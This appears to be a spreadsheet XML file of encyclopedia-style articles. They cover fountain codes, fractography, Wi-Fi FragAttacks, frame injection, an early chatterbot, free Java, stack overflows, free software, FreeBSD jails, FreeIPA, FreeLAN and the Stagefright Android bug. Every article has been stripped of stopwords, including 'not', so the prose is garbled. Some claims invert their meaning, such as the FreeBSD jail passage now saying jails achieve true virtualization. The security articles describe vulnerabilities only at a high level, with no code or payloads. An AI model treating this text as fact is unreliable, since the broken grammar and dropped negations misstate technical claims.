dvb-iptv delivering commercial services network. this code used 8,192 source symbols source block, total 65,536 encoded symbols generated source block. this code average relative reception overhead 0.2% applied source blocks 1,000 source symbols, relative reception overhead less probability 99.9999%. relative reception overhead defined extra encoding data required beyond length source data recover original source data, measured percentage size source data. example, relative reception overhead 0.2%, means source data size megabyte recovered 1.002 megabytes encoding data. advanced raptor code greater flexibility improved reception overhead, called raptorq, specified ietf 6330. specified raptorq code used 56,403 source symbols source block, total 16,777,216 encoded symbols generated source block. this code able recover source block encoded symbols equal number source symbols source block high probability, rare cases slightly number source symbols source block. raptorq code integral part route instantiation specified atsc a-331 (atsc 3.0) fountain codes data storage erasure codes used data storage applications massive savings number storage units given level redundancy reliability. requirements erasure code design data storage, particularly distributed storage applications, might quite different relative communication data streaming scenarios. requirements coding data storage systems systematic form, i.e., original message symbols part coded symbols. systematic form enables reading message symbols without decoding storage unit. addition, since bandwidth communication load storage nodes bottleneck, codes allow minimum communication beneficial particularly node fails system reconstruction needed achieve initial level redundancy. respect, fountain codes expected allow efficient repair process case failure: when single encoded symbol lost, require much communication computation among encoded symbols order resurrect lost symbol. fact, repair latency might sometimes important storage space savings. repairable fountain codes projected address fountain code design objectives storage systems. detailed survey fountain codes applications found at.a different approach distributed storage using fountain codes proposed liquid cloud storage. liquid cloud storage based using large erasure code raptorq code specified ietf 6330 (which provides significantly better data protection systems), using background repair process (which significantly reduces repair bandwidth requirements compared systems), using stream data organization (which allows fast access data even encoded symbols available). also online codes linear network coding secret sharing tornado codes, precursor fountain codes notes references amin shokrollahi michael luby (2011). "raptor codes". foundations trends communications information theory. publishers. (3–4): 213–322. doi:10.1561/0100000060. s2cid 1731099. luby, michael (2002). codes". ieee symposium foundations computer science: 271–282. doi:10.1109/sfcs.2002.1181950. isbn 0-7695-1822-2. s2cid 1861068. shokrollahi (2006), "raptor codes", ieee transactions information theory, (6): 2551–2567, doi:10.1109/tit.2006.874390, s2cid 61814971. maymounkov (november 2002). "online codes" (pdf). (technical report). david mackay (2003). information theory, inference, learning algorithms. cambridge university press. bibcode:2003itil.book.....m. isbn 0-521-64298-1. luby, shokrollahi, watson, stockhammer (october 2007), raptor forward error correction scheme object delivery, 5053{{citation}}: maint: multiple names: authors list (link). luby, shokrollahi, watson, stockhammer, minder (may 2011), raptorq forward error correction scheme object delivery, 6330{{citation}}: maint: multiple names: authors list (link).</t>
  </si>
  <si>
    <t>Fractography</t>
  </si>
  <si>
    <t>fractography study fracture surfaces materials. fractographic methods routinely used determine cause failure engineering structures, especially product failure practice forensic engineering failure analysis. material science research, fractography used develop evaluate theoretical models crack growth behavior. aims fractographic examination determine cause failure studying characteristics fractured surface. different types crack growth (e.g. fatigue, stress corrosion cracking, hydrogen embrittlement) produce characteristic features surface, used help identify failure mode. overall pattern cracking important single crack, however, especially case brittle materials like ceramics glasses. usage fractography widely used technique forensic engineering, forensic materials engineering fracture mechanics understand causes failures also verify theoretical failure predictions real life failures. forensic science analysing broken products used weapons, broken bottles example. thus defendant might claim bottle faulty broke accidentally impacted victim assault. fractography could show allegation false, considerable force needed smash bottle using broken weapon deliberately attack victim. bullet holes glass windscreens windows also indicate direction impact energy projectile. cases, overall pattern cracking vital reconstructing sequence events, rather specific characteristics single crack. fractography determine whether cause train derailment faulty rail, wing plane fatigue cracks crash. fractography used also materials research, since fracture properties correlate properties structure materials. feature identification origin important fractography establish examine origin cracking, examination origin reveal cause crack initiation. initial fractographic examination commonly carried macro scale utilising power optical microscopy oblique lighting techniques identify extent cracking, possible modes likely origins. optical microscopy macrophotography often enough pinpoint nature failure causes crack initiation growth loading pattern known. common features cause crack initiation inclusions, voids empty holes material, contamination, stress concentrations. fatigue crack growth image broken crankshaft shows component failed surface defect near bulb lower centre. semi-circular marks near origin indicate crack growing bulk material process known fatigue. crankshaft also shows hachures, lines fracture surfaces traced back origin fracture. some modes crack growth leave characteristic marks surface identify mode crack growth origin macro scale e.g. beachmarks striations fatigue cracks. microscopy microscopes used determine initiation point mechanism caused crack growth. information obtained images fracture surface known fractographs used constructing diagrams. schematic fracture surface used isolate identify features surface show product failed. such valuable presenting information shows clearly crack initiated grew time. microscopy microscopes especially useful examining fracture surface features since small enough hand-held. variety camera sizes resolution available commercially cost. camera cable plugs computer plug devices come illumination camera supplied lights. scanning electron microscopy many cases, fractography requires examination finer scale, usually carried scanning electron microscope sem. resolution much higher optical microscope, although samples examined partial vacuum colour absent. improved sem's allow examination near atmospheric pressures, allowing examination sensitive materials biological origin. especially useful combined energy dispersive x-ray spectroscopy edx, performed microscope, small areas sample analysed elemental composition. example breast implant cusp formed brittle cracks meet, shown picture failed catheter (cp). cusp formed brittle failure catheter breast implant silicone rubber. origin cracks shoulder left-hand side. identifying features allow fracture surface made surface studied. implant failed overload, imposed loads concentrated connection catheter holding salt solution. result, patient reported loss fluid implant, extracted surgically replaced. case failed breast implant catheter, crack path simple, cause subtle. further scanning electron microscopy showed numerous microcracks catheter, indicating adhesive bond components failed prematurely, perhaps faulty manufacture. material construction catheter, silicone rubber physically weak elastomer, product design must allow tear shear strength material. maritime patrol aircraft non-critical crack occurred fastener hole lower wing plank. plank made thick aa7075-t6 aluminium alloy. time detection crack aircraft's counting g-meter allowed investigators find load aircraft use. cracks showed evidence patterns fatigue. cyclic load fatigue appeared progressively gone worse cracks large others small length width indicating occasional force stronger g's. g-meter showed aircraft flown takeoff landing 302,180 times, force acceleration occasionally exceeding g's. this maximum advertised manufacturer. conclusion fatigue cracks inspected regularly commonly used aircraft. study also found novel ways quantitative fractography used aircraft, compares load history case g-meter) records alloy experiencing fatigue setting different pressure, cycles, temperatures. study used database cracks create model predicts forces crack progression. also conchoidal fracture fatigue (material) failure analysis forensic engineering forensic materials engineering fracture forensic polymer engineering forensic science references lewis, peter rhys, reynolds, gagg, forensic materials engineering: case studies, press (2004). mills, kathleen fractography, american society metals (asm) handbook, volume (1991). n.t. goldsmith, r.j.h. wanhill, molent, quantitative fractography fatigue illustrative case study, engineering failure analysis, volume (february 2019) pages 426–435.</t>
  </si>
  <si>
    <t>FragAttacks</t>
  </si>
  <si>
    <t>fragattacks, fragmentation aggregation attacks, group wi-fi vulnerabilities discovered security research mathy vanhoef. since vulnerabilities design flaws wi-fi standard, device released 1997 could vulnerable. attack executed without special privileges. attack detailed august 2021 black briefings later usenix 30th security symposium, recordings shared publicly. attack leave trace network logs. patches vanhoef worked wi-fi alliance help vendors issue patches.microsoft started issuing patches windows windows 2021. references external links fragment forge: breaking wi-fi through frame aggregation fragmentation mathy vanhoef</t>
  </si>
  <si>
    <t>Frame injection</t>
  </si>
  <si>
    <t>frame injection attack attack internet explorer internet explorer internet explorer load arbitrary code browser. this attack caused internet explorer checking destination resulting frame, therefore allowing arbitrary code javascript vbscript. this also happens code gets injected frames scripts validating input. this type frame injection affects browsers scripts validate untrusted input. references external links internet explorer frame injection vulnerability secunia updated 2008 archive microsoft security bulletin (ms98-020) updated: 2003</t>
  </si>
  <si>
    <t>Fred (chatterbot)</t>
  </si>
  <si>
    <t>fred, fred, early chatterbot written robby garner. history name fred initially suggested karen lindsey, robby jokingly came acronym, "functional response emulation device." fred also implemented java application paco nathan called jfred. fred chatterbot designed explore natural language communications people computer programs. particular, study conversation people ways computer program learn people's conversations make conversations.fred used minimalistic "stimulus-response" approach. worked storing database statements responses, made reply looking input statements made user rendering corresponding response database. this approach simplified complexity rule base, required expert coding editing modifications. fred predecessor albert one, garner used 1998 1999 loebner prize. also albert conditioning robby garner references external links download fred simonlaven.com jfred mac.com turing testing turinghub.com chatbot guide</t>
  </si>
  <si>
    <t>Free Java implementations</t>
  </si>
  <si>
    <t>free java implementations software projects implement oracle's java technologies distributed free software licences, making free software. released java source code free software 2007, almost considered free java implementation. java implementations include compilers, runtimes, class libraries, etc. advocates free open source software refer free open source java virtual machine software free runtimes free java runtimes. some advocates movement prefer term "java" trademark issues associated hence, even though "free java movement", term "free java runtimes" avoided them. mid-1990s 2006 first free project offer substantial parts java platform functionality likely guavac, began time november 1995.since then, free software movement developed java compilers, notably compiler java. others include eclipse java compiler (ecj), maintained eclipse foundation, jikes, longer actively maintained. since compiler collection's release, (its java compiler) using parser front-end parsing java.examples free runtime environments include kaffe, sablevm gcj. classpath main free software class library java. most free runtimes classpath class library. 2005, apache harmony announced, however, project chose apache license, time incompatible existing free java implementations. another event 2005 announcement openoffice.org would depend java features free software implementations provide. following controversy, openoffice.org adopted guideline requiring work free java implementations. notable applications already worked free software java implementations november 2006 include openoffice.org vuze, work compiled gcj. sun's november 2006 announcement november 2006, released compiler, javac, general public license.as september 2007, well javac, released code hotspot (the virtual machine) almost java class library free software. following promise release fully buildable based almost completely free open source code first half 2007, released complete source code class library 2007, except limited parts licensed parties want code released free software licence. stated aims replace parts remain proprietary closed source alternative implementations make class library completely free open source. since there's encumbered code jdk, continue code commercial releases replaced fully functional free open-source alternatives. after 2007 code release 2008, part class library remains proprietary 2007 openjdk less 2008 openjdk snmp implementation.since first 2007 release, microsystems, help community, released free software replaced free-software alternatives) almost encumbered code: audio engine code, including software synthesizer, released open-source. closed-source software synthesizer replaced synthesizer developed specifically openjdk called gervill, cryptography classes used class library released free software, freetype replaced code scales rasterizes fonts. littlecms replaced native color-management system. there pluggable layer jdk, commercial version color management system openjdk littlecms. open-sourced pisces renderer used phoneme project replaced anti-aliasing graphics rasterizer code. this code fully functional, still needs performance enhancements, javascript plugin open-sourced (the javascript engine open-sourced beginning).because previously encumbered components, possible build openjdk free software components. order able whole class library made free, able bundle openjdk fedora core free linux distributions, started project called icedtea. basically openjdk/gnu classpath hybrid used bootstrap openjdk using free software.as march 2008, fedora distribution released openjdk instead icedtea implementation openjdk some stated reasons change are: replaced encumbrances icedtea providing replacements (less encumbered code remains class library, code necessary openjdk). openjdk stable branch, whereas openjdk unstable expected ship stable release 2009. licensed openjdk trademark fedora.in june 2008, announced icedtea packaged version openjdk fedora passed technology compatibility tests claim fully compatible java implementation.in september 2013, azul systems released zulu, free, open source build openjdk windows server microsoft azure cloud. later releases added support multiple versions linux java platform, standard edition version zulu certified compliant java using openjdk community technology compatibility kit.amazon released amazon corretto no-cost, multiplatform, production-ready distribution open java development kit. released classpath exception. long term support versions java java available. first publicly released january 2019. also java (software platform) javac hotspot apache harmony openjdk classpath, gcj, icedtea jamvm ikvm.net list java virtual machines comparison java virtual machines references external links free shackled java trap escaping java trap: practical road free software open source alternatives hybrids combine classpath openjdk hour long 2007 video workshop sun, ggj, classpath developers java trademark issues</t>
  </si>
  <si>
    <t>Stack overflow</t>
  </si>
  <si>
    <t>software, stack overflow occurs call stack pointer exceeds stack bound. call stack consist limited amount address space, often determined start program. size call stack depends many factors, including programming language, machine architecture, multi-threading, amount available memory. when program attempts space available call stack (that attempts access memory beyond call stack's bounds, essentially buffer overflow), stack said overflow, typically resulting program crash. causes infinite recursion most-common cause stack overflow excessively deep infinite recursion, function calls many times space needed store variables information associated call stack.an example infinite recursion function foo, invoked, continues invoke itself, allocating additional space stack time, stack overflows resulting segmentation fault. however, compilers implement tail-call optimization, allowing infinite recursion specific sort—tail recursion—to occur without stack overflow. this works tail-recursion calls take additional stack space.some compiler options effectively enable tail-call optimization; example, compiling simple program using result segmentation fault, using -o3, since optimization levels imply -foptimize-sibling-calls compiler option. other languages, scheme, require implementations include tail-recursion part language standard. very deep recursion recursive function terminates theory causes call stack buffer overflow practice fixed transforming recursion loop storing function arguments explicit stack (rather implicit call stack). this always possible class primitive recursive functions equivalent class loop computable functions. consider example c++-like pseudocode: primitive recursive function like left side always transformed loop like right side. function like example left would problem environment supporting tail-call optimization; however, still possible create recursive function result stack overflow languages. consider example simple integer exponentiation functions. both pow(base, exp) functions compute equivalent result, however, left prone causing stack overflow tail-call optimization possible function. during execution, stack functions look like this: notice function left must store stack number integers, multiplied recursion terminates function returns contrast, function right must store integers time, computes intermediary result passed following invocation. information outside current function invocation must stored, tail-recursion optimizer "drop" prior stack frames, eliminating possibility stack overflow. very large stack variables major cause stack overflow results attempt allocate memory stack fit, example creating local array variables large. reason authors recommend arrays larger kilobytes allocated dynamically instead local variable.an example large stack variable implementation byte double-precision floats, declared array consumes megabytes data; memory available stack thread creation parameters operating system limits), stack overflow occur. stack overflows made worse anything reduces effective stack size given program. example, program without multiple threads might work fine, soon multi-threading enabled program crash. this programs threads less stack space thread program threading support. because kernels generally multi-threaded, people kernel development usually discouraged using recursive algorithms large stack buffers. also buffer overflow call stack heap overflow stack buffer overflow double fault references external links reasons 64-bit programs require stack memory</t>
  </si>
  <si>
    <t>Free software</t>
  </si>
  <si>
    <t>free software libre software, infrequently known freedom-respecting software, computer software distributed terms allow users software purpose well study, change, distribute adapted versions. free software matter liberty, price; users legally free want copies free software (including profiting them) regardless much paid obtain program. computer programs deemed "free" give end-users (not developer) ultimate control software and, subsequently, devices.the right study modify computer program entails source code—the preferred format making changes—be made available users program. while often called "access source code" "public availability", free software foundation (fsf) recommends thinking terms, might give impression users obligation opposed right) give non-users copy program. although term "free software" already used loosely past permissive software like berkeley software distribution released 1978 existed, richard stallman credited tying sense discussion starting free software movement 1983, launched project: collaborative effort create freedom-respecting operating system, revive spirit cooperation prevalent among hackers early days computing. context free software thus differs from: proprietary software, microsoft office, google docs, sheets, slides iwork apple. users cannot study, change, share source code. freeware, category proprietary software require payment basic use.for software purview copyright free, must carry software license whereby author grants users aforementioned rights. software covered copyright law, software public domain, free long source code public domain too, otherwise available without restrictions. proprietary software uses restrictive software licences eulas usually provide users source code. users thus legally technically prevented changing software, results reliance publisher provide updates, help, support. (see also vendor lock-in abandonware). users often reverse engineer, modify, redistribute proprietary software. beyond copyright law, contracts lack source code, exist additional obstacles keeping users exercising freedom piece software, software patents digital rights management (more specifically, tivoization).free software for-profit, commercial activity not. some free software developed volunteer computer programmers developed corporations; even both. naming differences open source although definitions refer almost equivalent corpora programs, free software foundation recommends using term "free software" rather "open-source software" younger vision coined 1998), goals messaging quite dissimilar. according free software foundation, "open source" associated campaign mostly focus technicalities public development model marketing free software businesses, taking ethical issue user rights lightly even antagonistically. stallman also stated considering practical advantages free software like considering practical advantages handcuffed, necessary individual consider practical reasons order realize handcuffed undesirable itself.the also notes "open source" exactly specific meaning common english, namely "you look source code." states term "free software" lead different interpretations, least consistent intended meaning unlike term "open source". loan adjective "libre" often used avoid ambiguity word "free" english language, ambiguity older usage "free software" public-domain software. (see gratis versus libre.) definition four essential freedoms free software first formal definition free software published february 1986. that definition, written richard stallman, still maintained today states software free software people receive copy software following four freedoms. numbering begins zero, spoof common usage zero-based numbering programming languages, also "freedom initially included list, later added first list considered important. freedom freedom program purpose. freedom freedom study program works, change make wish. freedom freedom redistribute make copies help neighbor. freedom freedom improve program, release improvements (and modified versions general) public, whole community benefits.freedoms require source code available studying modifying software without source code range highly impractical nearly impossible. thus, free software means computer users freedom cooperate choose, control software use. summarize remark distinguishing libre (freedom) software gratis (zero price) software, free software foundation says: "free software matter liberty, price. understand concept, think 'free' 'free speech', 'free beer'". (see gratis versus libre.) late 1990s, groups published definitions describe almost identical software. notable debian free software guidelines published 1997, open source definition, published 1998. bsd-based operating systems, freebsd, openbsd, netbsd, formal definitions free software. users systems generally find software acceptable, sometimes copyleft restrictive. they generally advocate permissive free software licenses, allow others software wish, without legally forced provide source code. their view permissive approach free. kerberos, x11, apache software licenses substantially similar intent implementation. examples there thousands free applications many operating systems available internet. users easily download install applications package manager comes included linux distributions. free software directory maintains large database free-software packages. some best-known examples include linux kernel, linux operating systems, compiler collection library; mysql relational database; apache server; sendmail mail transport agent. other influential examples include emacs text editor; gimp raster drawing image editor; window system graphical-display system; libreoffice office suite; latex typesetting systems. history from 1950s early 1970s, normal computer users software freedoms associated free software, typically public-domain software. software commonly shared individuals used computers hardware manufacturers welcomed fact people making software made hardware useful. organizations users suppliers, example, share, formed facilitate exchange software. software often written interpreted language basic, source code distributed programs. software also shared distributed printed source code (type-in program) computer magazines (like creative computing, softside, compute!, byte, etc.) books, like bestseller basic computer games. early 1970s, picture changed: software costs dramatically increasing, growing software industry competing hardware manufacturer's bundled software products (free cost included hardware cost), leased machines required software support providing revenue software, customers able better meet needs want costs "free" software bundled hardware product costs. united states ibm, filed january 1969, government charged bundled software anti-competitive. while software might always free, would henceforth growing amount software produced primarily sale. 1970s early 1980s, software industry began using technical measures (such distributing binary copies computer programs) prevent computer users able study adapt software applications fit. 1980, copyright extended computer programs. 1983, richard stallman, original authors popular emacs program longtime member hacker community artificial intelligence laboratory, announced project, purpose produce completely non-proprietary unix-compatible operating system, saying become frustrated shift climate surrounding computer world users. initial declaration project purpose, specifically cited motivation opposition asked agree non-disclosure agreements restrictive licenses prohibited free sharing potentially profitable in-development software, prohibition directly contrary traditional hacker ethic. software development operating system began january 1984, free software foundation (fsf) founded october 1985. developed free software definition concept "copyleft", designed ensure software freedom all. some non-software industries beginning techniques similar used free software development research development process; scientists, example, looking towards open development processes, hardware microchips beginning developed specifications released copyleft licenses (see opencores project, instance). creative commons free-culture movement also largely influenced free software movement. 1980s: foundation project 1983, richard stallman, longtime member hacker community artificial intelligence laboratory, announced project, saying become frustrated effects change culture computer industry users. software development operating system began january 1984, free software foundation (fsf) founded october 1985. article outlining project goals published march 1985 titled manifesto. manifesto included significant explanation philosophy, free software definition "copyleft" ideas. 1990s: release linux kernel linux kernel, started linus torvalds, released freely modifiable source code 1991. first licence proprietary software licence. however, version 0.12 february 1992, relicensed project general public license. much like unix, torvalds' kernel attracted attention volunteer programmers. freebsd netbsd (both derived 386bsd) released free software bsdi lawsuit settled court 1993. openbsd forked netbsd 1995. also 1995, apache http server, commonly referred apache, released apache license 1.0. licensing free-software licenses must grant users freedoms discussed above. however, unless applications' licenses compatible, combining programs mixing source code directly linking binaries problematic, license technicalities. programs indirectly connected together avoid problem. majority free software falls small licenses. popular licenses are: license general public license (gplv2) apache license general public license (gplv3) license lesser general public license (lgpl) mozilla public license (mpl) eclipse public licensethe free software foundation open source initiative publish lists licenses find comply definitions free software open-source software respectively: list approved software licenses list approved software licensesthe list prescriptive: free-software licenses exist heard about, considered important enough write about. possible license free list. list lists licenses submitted, considered approved. open-source licenses must meet open source definition order officially recognized open source software. free software, hand, informal classification rely official recognition. nevertheless, software licensed licenses meet free software definition cannot rightly considered free software. apart organizations, debian project seen provide useful advice whether particular licenses comply debian free software guidelines. debian publish list approved licenses, judgments tracked checking software allowed software archives. that summarized debian site.it rare license announced in-compliance guidelines also meet open source definition, although reverse necessarily true (for example, nasa open source agreement osi-approved license, non-free according fsf). there different categories free software. public-domain software: copyright expired, work copyrighted (released without copyright notice 1988), author released software onto public domain waiver statement countries possible). since public-domain software lacks copyright protection, freely incorporated work, whether proprietary free. recommends public domain dedication purpose. permissive licenses, also called bsd-style applied much software distributed operating systems: many licenses also known copyfree restrictions distribution. author retains copyright solely disclaim warranty require proper attribution modified works, permits redistribution modification, even closed-source ones. sense, permissive license provides incentive create non-free software, reducing cost developing restricted software. since incompatible spirit software freedom, many people consider permissive licenses less free copyleft licenses. copyleft licenses, general public license prominent: author retains copyright permits redistribution restriction redistribution licensed license. additions modifications others must also licensed "copyleft" license whenever distributed part original licensed product. this also known viral, protective, reciprocal license. restriction distribution everyone considers type license free. security reliability there debate security free software comparison proprietary software, major issue security obscurity. popular quantitative test computer security relative counting known unpatched security flaws. generally, users method advise avoiding products lack fixes known security flaws, least available. free software advocates strongly believe methodology biased counting vulnerabilities free software systems, since source code accessible community forthcoming problems exist, (this called "security through disclosure") proprietary software systems undisclosed societal drawbacks, disenfranchising less fortunate would-be users free programs. users analyse trace source code, many people commercial constraints inspect code find bugs loopholes corporation would find practicable. according richard stallman, user access source code makes deploying free software undesirable hidden spyware functionality difficult proprietary software.some quantitative studies done subject. binary blobs proprietary software 2006, openbsd started first campaign binary blobs kernels. blobs usually freely distributable device drivers hardware vendors reveal driver source code users developers. this restricts users' freedom effectively modify software distribute modified versions. also, since blobs undocumented bugs, pose security risk operating system whose kernel includes them. proclaimed campaign blobs collect hardware documentation allows developers write free software drivers hardware, ultimately enabling free operating systems become remain blob-free. issue binary blobs linux kernel device drivers motivated developers ireland launch gnewsense, linux based distribution binary blobs removed. project received support free software foundation stimulated creation, headed free software foundation latin america, linux-libre kernel. october 2012, trisquel popular endorsed linux distribution ranked distrowatch (over months). while debian endorsed linux-libre, also popular distribution available without kernel blobs default since 2011. business model selling software free-software licence permissible, commercial use. this true licenses without copyleft.since free software freely redistributed, generally available little fee. free software business models usually based adding value customization, accompanying hardware, support, training, integration, certification. exceptions exist however, user charged obtain copy free application itself.fees usually charged distribution compact discs bootable drives, services installing maintaining operation free software. development large, commercially used free software often funded combination user donations, crowdfunding, corporate contributions, money. selinux project united states national security agency example federally funded free-software project. proprietary software, hand, tends different business model, customer proprietary application pays license legally access this license grant customer ability configure parts software themselves. often level support included purchase proprietary software, additional support services (especially enterprise applications) usually available additional fee. some proprietary software vendors also customize software fee.the free software foundation encourages selling free software. foundation written, "distributing free software opportunity raise funds development. don't waste it!". example, fsf's recommended license (the gpl) states "[you] charge price price copy convey, offer support warranty protection fee."microsoft steve ballmer stated 2001 "open source available commercial companies. license written, open-source software, make rest software open source." this misunderstanding based requirement copyleft licenses (like gpl) distributes modified versions software, must release source license. this requirement extend software developer. claim incompatibility commercial companies free software also misunderstanding. there several large companies, e.g. ibm, substantial commercial business development free software. economic aspects adoption free software played significant part development internet, world wide infrastructure dot-com companies. free software allows users cooperate enhancing refining programs use; free software pure public good rather private good. companies contribute free software increase commercial innovation. economic viability free software recognized large corporations ibm, hat, microsystems. many companies whose core business sector choose free software internet information sales sites, lower initial capital investment ability freely customize application packages. most companies software business include free software commercial products licenses allow that.free software generally available cost result permanently lower costs compared proprietary software. with free software, businesses software specific needs changing software hiring programmers modify them. free software often warranty, importantly, generally assign legal liability anyone. however, warranties permitted parties upon condition software usage. such agreement made separately free software license. report standish group estimates adoption free software caused drop revenue proprietary software industry billion year. eric raymond argued term free software ambiguous intimidating business community. raymond promoted term open-source software friendlier alternative business corporate world. also notes references further reading puckette, miller. "who owns software?: first-person case study." econtact (september 2009). montréal: hancock, terry. "the jargon freedom: words phrases context". free software magazine. 2010-20-24 stallman, richard (2010) [2002]. free software free society: selected essays richard stallman, edition. press. isbn 978-0-9831592-0-9. external links</t>
  </si>
  <si>
    <t>FreeBSD jail</t>
  </si>
  <si>
    <t>jail mechanism implementation freebsd's os-level virtualisation allows system administrators partition freebsd-derived computer system several independent mini-systems called jails, sharing kernel, little overhead. implemented system call, jail(2), well userland utility, jail(8), plus, depending system, number utilities. functionality committed freebsd 1999 poul-henning kamp period production hosting provider, first released freebsd 4.0, thus supported number freebsd descendants, including dragonfly bsd, day. need freebsd jails came small shared-environment hosting provider's (r&amp;d associates, inc.'s owner, derrick woolworth) desire establish clean, clear-cut separation services customers, mainly security ease administration (jail(8)). instead adding layer fine-grained configuration options, solution adopted poul-henning kamp compartmentalize system files resources right people given access right compartments. history jails first introduced freebsd version 4.0, released march 2000 (2000-03-14). most original functionality supported dragonfly, several features ported well. goals freebsd jails mainly three goals: virtualization: each jail virtual environment running host machine files, processes, user superuser accounts. from within jailed process, environment almost indistinguishable real system. security: each jail sealed others, thus providing additional level security. ease delegation: limited scope jail allows system administrators delegate several tasks require superuser access without handing complete control system.unlike chroot jail, restricts processes particular view filesystem, freebsd jail mechanism restricts activities process jail respect rest system. effect, jailed processes sandboxed. they bound specific addresses, jailed process cannot access divert routing sockets. sockets also disabled default, enabled setting security.jail.allow_raw_sockets sysctl option. additionally, interaction processes running jail restricted. jail(8) utility jail(2) system call first appeared freebsd 4.0. utilities (for example jls(8) list jails) system calls (for example jail_attach(2) attach process jail) render jail management much easier added freebsd 5.1. jail subsystem received significant updates freebsd 7.2, including support multiple ipv4 ipv6 addresses jail support binding jails specific cpus. virtualization with jail possible create various virtual machines, utilities installed configuration. this makes safe software. example, possible different versions different configurations server package different jails. since jail limited narrow scope, effects misconfiguration mistake (even done in-jail superuser) jeopardize rest system's integrity. since nothing actually modified outside jail, "changes" discarded deleting jail's copy directory tree. virtualization valuable service providers wishing offer users ability custom configurations keep overall system easy maintain. example, different customers could need different versions software. without jails, configuring multiple software versions different directories ensuring encroach always possible easy maintain (e.g. xfree86 notoriously hard move around). jails hand permit software packages view system egoistically, package machine itself. jails also own, independent, jailed superusers. freebsd jail however achieve true virtualization; allow virtual machines different kernel versions base system. virtual servers share kernel hence expose bugs potential security holes. there support clustering process migration, host kernel host computer still single point failure virtual servers. possible jails safely test software, kernels. security freebsd jails effective increase security server separation jailed environment rest system (the jails base system). example, non-jailed system, server running user introduces php-include vulnerability would compromise entire system: attacker would rights user typically modify files server, wander directory tree gather information, full user list, shell home directory /etc/passwd. server jailed, scope user limited jail, turn minimalistic enough give away much. even attacker gained access jail's superuser account, could modify jail, whole system. freebsd jails limited following ways: jailed processes cannot interact processes different jail, main host. example, command show processes running jail. modifying running kernel direct access loading modules prohibited. modifying sysctls securelevel prohibited. modifying network configuration, including interfaces, interface addresses, routing table, prohibited. accessing divert routing sockets also prohibited. additionally, sockets disabled default. jail bound specific addresses firewall rules cannot changed. with introduction vnet(virtual network stack), jails free modify network configuration (including interfaces, addresses, etc.), provided vnet enabled jail.mounting unmounting filesystems prohibited. jails cannot access files root directory (i.e. jail chroot'ed). jailed processes cannot create device nodes. also references external links jails poul-henning kamp jail(8) page freebsd jails onlamp jail freebsd freebsd handbook: jails vnet manpage</t>
  </si>
  <si>
    <t>FreeIPA</t>
  </si>
  <si>
    <t>freeipa free open source identity management system. freeipa upstream open-source project identity management. overview freeipa aims provide centrally managed identity, policy, audit (ipa) system. uses combination fedora linux, directory server, kerberos, ntp, dns, dogtag certificate system, sssd free/open-source components. freeipa includes extensible management interfaces (cli, xmlrpc jsonrpc api) python integrated bind custom plugin integrated server. each major components freeipa operates preexisting free/open-source project. bundling components single manageable suite comprehensive management interface gplv3, change licenses components. since version 3.0.0, freeipa uses samba integrate microsoft's active directory cross forest trusts. freeipa provides support linux, unix-based, windows computers. software components popular plugins releases also list ldap software active directory apple open directory identity management list single sign-on implementations references external links official website</t>
  </si>
  <si>
    <t>FreeLAN</t>
  </si>
  <si>
    <t>freelan computer software implements peer-to-peer, full mesh, virtual private network (vpn) techniques creating secure point-to-point site-to-site connections routed bridged configurations remote access facilities. free open-source software licensed general public license version (gnu gplv3). encryption freelan uses openssl library provide encryption data control channels. lets openssl encryption authentication work, allowing freelan ciphers available openssl package. authentication freelan several ways authenticate peers other. from version freelan offers pre-shared keys, certificate-based, username-password based authentication. references external links official website</t>
  </si>
  <si>
    <t>Stagefright (bug)</t>
  </si>
  <si>
    <t>stagefright name given group software bugs affect versions "froyo" 5.1.1 "lollipop" android operating system exposing estimated million devices (95% android devices) time. name taken affected library, among things, used unpack messages. exploitation allows attacker perform arbitrary operations victim's device remote code execution privilege escalation. security researchers demonstrate bugs proof concept sends specially crafted messages victim device cases requires end-user actions upon message reception succeed—the user anything 'accept' exploits using bug; happens background. phone number information needed carry attack.the underlying attack vector exploits certain integer overflow vulnerabilities android core component called libstagefright, complex software library implemented primarily part android open source project (aosp) used backend engine playing various multimedia formats files.the discovered bugs provided multiple common vulnerabilities exposures (cve) identifiers, cve-2015-1538, cve-2015-1539, cve-2015-3824, cve-2015-3826, cve-2015-3827, cve-2015-3828, cve-2015-3829 cve-2015-3864 (the latter assigned separately others), collectively referred stagefright bug. history stagefright discovered joshua drake zimperium security firm, publicly announced first time july 2015. prior announcement, drake reported google april 2015, incorporated related bugfix internal source code repositories days report. july 2015, evgeny legerov, moscow-based security researcher, announced found least similar heap overflow zero-day vulnerabilities stagefright library, claiming time library already exploited while. legerov also confirmed vulnerabilities discovered become unexploitable applying patches drake submitted google.the public full disclosure stagefright bug, presented drake, took place august 2015 black computer security conference, august 2015 hacker convention. following disclosure, august 2015, zimperium publicly released source code proof-of-concept exploit, actual patches stagefright library (although patches already publicly available since early 2015 aosp open-source repositories), android application called "stagefright detector" tests whether android device vulnerable stagefright bug.on august 2015, another stagefright vulnerability, cve-2015-3864, published exodus intelligence. this vulnerability mitigated existing fixes already known vulnerabilities. cyanogenmod team published notice patches cve-2015-3864 incorporated cyanogenmod 12.1 source august 2015.on october 2015, zimperium released details vulnerabilities, also known stagefright 2.0. this vulnerability affects specially crafted files execute payload played using android media server. vulnerability assigned identifier cve-2015-6602 found core android library called libutils; component android existed since android first released. android vulnerable attack estimated billion devices affected. implications while google maintains android's primary codebase firmware, updates various android devices responsibility wireless carriers original equipment manufacturers (oems). result, propagating patches actual devices often introduces long delays large fragmentation manufacturers, device variants, android versions, various android customizations performed manufacturers; furthermore, many older lower cost devices never receive patched firmware all. many unmaintained devices would need rooted, violates terms many wireless contracts. therefore, nature stagefright highlights technical organizational difficulties associated propagation android patches.as attempt address delays issues associated propagation android patches, august 2015 zimperium formed zimperium handset alliance (zha) association different parties interested exchanging information receiving timely updates android's security-related issues. members also received source code zimperium's proof-of-concept stagefright exploit publicly released. august 2015, largest android device oems wireless carriers joined zha. mitigation certain mitigations stagefright exist devices unpatched versions android, including disabling automatic retrieval messages blocking reception text messages unknown senders. however, mitigations supported applications (the google hangouts app, example, supports former), cover feasible attack vectors make exploitation stagefright possible means, opening downloading malicious multimedia file using device's browser.at first thought mitigation could come address space layout randomization (aslr) feature introduced android "ice cream sandwich", fully enabled android "jelly bean"; version android "lollipop" includes patches stagefright bug. unfortunately, later results exploits like metaphor bypass aslr discovered 2016. android software codecs moved constrained sandbox effectively mitigates threat devices capable running version also android version history list descriptions released versions android another remote code execution vulnerability found 2020 samsung android (oreo) 10.x smartphones cve-2020-8899 references external links stagefright demo zlabs youtube, august 2015 exploits database android platform security vulnerabilities google android google's android codebase patches stagefright bug: patch patch patch</t>
  </si>
